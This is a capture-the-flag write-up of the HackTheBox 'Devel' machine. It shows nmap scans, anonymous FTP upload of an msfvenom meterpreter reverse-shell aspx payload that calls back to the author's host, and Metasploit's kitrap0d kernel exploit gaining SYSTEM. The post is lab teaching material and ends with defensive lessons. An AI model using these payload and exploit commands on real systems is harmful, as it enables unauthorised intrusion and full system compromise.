Post

Devel

Walkthrough of the Devel machine – anonymous FTP tied to an IIS webroot, an msfvenom aspx webshell for initial access, and a Windows kernel exploit (kitrap0d) for SYSTEM.

Devel

Devel - HackTheBox Writeup

Devel is an Easy Windows machine on HackTheBox. It relies on anonymous FTP access that shares its root with the IIS webroot, allowing an .aspx webshell to be uploaded directly and executed over HTTP, followed by a classic Windows kernel privilege escalation to SYSTEM.

Box Info

  • Name: Devel
  • Difficulty: Easy
  • OS: Windows
  • Release Date: 15 Mar 2017
  • Retire Date: 14 Oct 2017
  • Creator: ch4p

Recon

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/machines
└─👀 ➜ nmap -p- --min-rate 10000 -oA nmap  10.129.56.140 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-09-04 00:07 EEST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.11% done; ETC: 00:07 (0:00:10 remaining)
Nmap scan report for 10.129.56.140
Host is up (0.29s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 17.72 seconds

┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/machines
└─👀 ➜ nmap -sCV -p21,80 10.129.56.140                   
Starting Nmap 7.95 ( https://nmap.org ) at 2026-09-04 00:09 EEST
Nmap scan report for 10.129.56.140
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 09-03-26  12:51AM                 1438 cmd.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
| 09-03-26  01:16AM                 2915 payload.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.31 seconds

Findings

  • FTP with anonymous login enabled on port 21
  • Microsoft IIS 7.5 web server running on port 80

Enumeration

First I logged into FTP using the anonymous account:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/machines
└─👀 ➜ ftp 10.129.56.140                                 
Connected to 10.129.56.140.
220 Microsoft FTP Service
Name (10.129.56.140:T4T4R1S): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49220|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

On this server I could read and upload files freely, and these same files are served directly by the web application — let’s confirm that:

alt text

Requesting the default server file returned exactly what I saw on the FTP listing, confirming the FTP root and the IIS webroot are the same directory. That means I can create a payload with msfvenom and upload it straight through the anonymous FTP access:

1
2
3
4
5
6
7
8
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/machines
└─👀 ➜ msfvenom -p windows/meterpreter/reverse_tcp Lhost=10.10.17.196 lport=4444 -f aspx -o payload.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2890 bytes
Saved as: payload.aspx

.aspx was the right choice of format since this is an IIS/ASP.NET server. Now to upload it via FTP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/machines
└─👀 ➜ ftp 10.129.56.140
Connected to 10.129.56.140.
220 Microsoft FTP Service
Name (10.129.56.140:T4T4R1S): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put payload.aspx 
local: payload.aspx remote: payload.aspx
229 Entering Extended Passive Mode (|||49221|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************|  2930       27.12 MiB/s    --:-- ETA
226 Transfer complete.
2930 bytes sent in 00:00 (7.54 KiB/s)
ftp> 

The payload now sits on the server, ready to be triggered over HTTP to get a reverse shell.


Initial Access

Started Metasploit and set up a multi/handler to catch the reverse shell:

1
2
3
4
5
6
7
8
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/machines
└─👀 ➜ msfconsole -q                                                                                    
[*] Starting persistent handler(s)...
msf6 > use mutli/handler
[-] No results from search
[-] Failed to load module: mutli/handler
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp

Set the payload to windows/meterpreter/reverse_tcp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf6 exploit(multi/handler) > options 

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > 

Set LHOST to my VPN interface and LPORT to any port, then ran the handler:

1
2
3
4
5
6
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.17.196
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.17.196:4444 

With the listener up, I triggered payload.aspx by requesting it directly in the browser:

alt text

And now we have a shell as iis apppool\web:

1
2
3
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

Privilege Escalation: iis apppool\web → SYSTEM

I used Metasploit’s post/multi/recon/local_exploit_suggester to enumerate viable privesc vectors:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  2         meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL  10.10.17.196:4444 -> 10.129.56.140:49222 (10.129.56.140)

msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.56.140 - Collecting local exploits for x86/windows...
[*] 10.129.56.140 - 205 exploit checks are being tried...
[+] 10.129.56.140 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.129.56.140 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.56.140 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.129.56.140 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.56.140 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.129.56.140 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.129.56.140 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.56.140 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.56.140 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.129.56.140 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.56.140 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[-] 10.129.56.140 - Post interrupted by the console user
[*] Post module execution completed

Several vectors came back. I went with exploit/windows/local/ms10_015_kitrap0d:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options 

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.211.55.3      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

View the full module info with the info, or info -d command.

Set the session, LHOST, and LPORT, then ran it — SYSTEM:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost tun0 
lhost => 10.10.17.196
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lport 5555
lport => 5555
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 2
session => 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.17.196:5555 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 2224 launched.
[*] Reflectively injecting the DLL into 2224...
[*] Sending stage (177734 bytes) to 10.129.56.140
[*] Meterpreter session 3 opened (10.10.17.196:5555 -> 10.129.56.140:49223) at 2026-09-04 00:40:28 +0300
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

meterpreter > shell
Process 3272 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

SYSTEM obtained. Solved – happy hacking!


Lessons

  • Anonymous FTP that shares a webroot with a live web server is a critical misconfiguration — any file uploaded is instantly reachable and executable over HTTP.
  • .aspx/.php/.jsp payload format should always match the underlying web technology (IIS/ASP.NET here) for the webshell to actually execute.
  • local_exploit_suggester is a fast way to shortlist Windows kernel privescs on old, unpatched targets — but always confirm a suggested module actually applies before firing it blindly.

Find me online:

• TryHackMe: t4t4r1s

• HackTheBox: t4t4r1s

• LinkedIn: Mustafa Eltayeb

• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.